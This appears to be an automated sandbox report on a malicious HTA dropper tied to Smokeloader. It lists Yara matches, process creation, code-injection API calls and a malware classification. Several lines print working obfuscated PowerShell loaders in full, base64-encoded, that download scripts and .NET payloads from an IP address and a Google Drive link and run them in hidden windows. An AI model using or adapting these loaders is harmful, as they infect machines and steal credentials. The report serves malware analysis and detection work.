QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,	13_2_00402F5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_00402321
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004025D3 NtClose,	13_2_004025D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_004014EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,	13_2_004022F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_00402686 NtClose,	13_2_00402686
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,	13_2_004030BF
Source: C:\Windows\explorer.exe	Code function: 14_2_02494760 NtCreateSection,	14_2_02494760
Source: C:\Windows\explorer.exe	Code function: 14_2_02492FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,	14_2_02492FAC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02974B92 RtlMoveMemory,NtUnmapViewOfSection,	19_2_02974B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_029733C3 NtQueryInformationFile,	19_2_029733C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0297349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	19_2_0297349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0297342B NtQueryObject,NtQueryObject,RtlMoveMemory,	19_2_0297342B
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD38B0 NtUnmapViewOfSection,	20_2_00FD38B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_03201016 RtlMoveMemory,NtUnmapViewOfSection,	21_2_03201016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C23D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,	22_2_02C23D8D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C21F4E NtCreateSection,NtMapViewOfSection,	22_2_02C21F4E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C21FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	22_2_02C21FE5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C22E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,	22_2_02C22E1B
Source: C:\Windows\explorer.exe	Code function: 23_2_00A05300 NtUnmapViewOfSection,	23_2_00A05300
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	24_2_02A21016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A21A80 NtCreateSection,NtMapViewOfSection,	24_2_02A21A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	24_2_02A21819
Source: C:\Windows\explorer.exe	Code function: 28_2_0014355C NtUnmapViewOfSection,	28_2_0014355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_00151016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	30_2_00151016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_001518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	30_2_001518BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_00151B26 NtCreateSection,NtMapViewOfSection,	30_2_00151B26
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC370C NtUnmapViewOfSection,	31_2_00AC370C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_044C941C	10_2_044C941C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_044C2C80	10_2_044C2C80
Source: C:\Windows\explorer.exe	Code function: 14_2_02492840	14_2_02492840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02972198	19_2_02972198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0297C2F9	19_2_0297C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0298B35C	19_2_0298B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_029C4438	19_2_029C4438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0298B97E	19_2_0298B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02976E6A	19_2_02976E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02995F08	19_2_02995F08
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD1E20	20_2_00FD1E20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0320170B	21_2_0320170B
Source: C:\Windows\explorer.exe	Code function: 23_2_00A02C00	23_2_00A02C00
Source: C:\Windows\explorer.exe	Code function: 28_2_00142054	28_2_00142054
Source: C:\Windows\explorer.exe	Code function: 28_2_00142860	28_2_00142860
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC2A04	31_2_00AC2A04
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC20F4	31_2_00AC20F4

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02978801 appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02977F70 appears 32 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4232 -s 704

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2246
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2246			Jump to behavior

Source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6128, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.bank.troj.spyw.expl.evad.winHTA@42/37@3/4

Source: C:\Windows\explorer.exe

Code function: 14_2_02493BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,

14_2_02493BF4

Source: C:\Windows\explorer.exe

Code function: 14_2_024935E8 CoCreateInstance,

14_2_024935E8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\seethebestthingsentiretimewithgreatthignstoebe[1].tiff

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3200:120:WilError_03
Source: C:\Users\user\AppData\Roaming\wihaduv	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4232
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpuuo5cn.rgw.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS"

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5A09.tmp.19.dr, 5D77.tmp.19.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	ReversingLabs: Detection: 18%
Source: veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	Virustotal: Detection: 27%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\veryeasythingsevermadeforcreatenewthignsbetterthigns.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
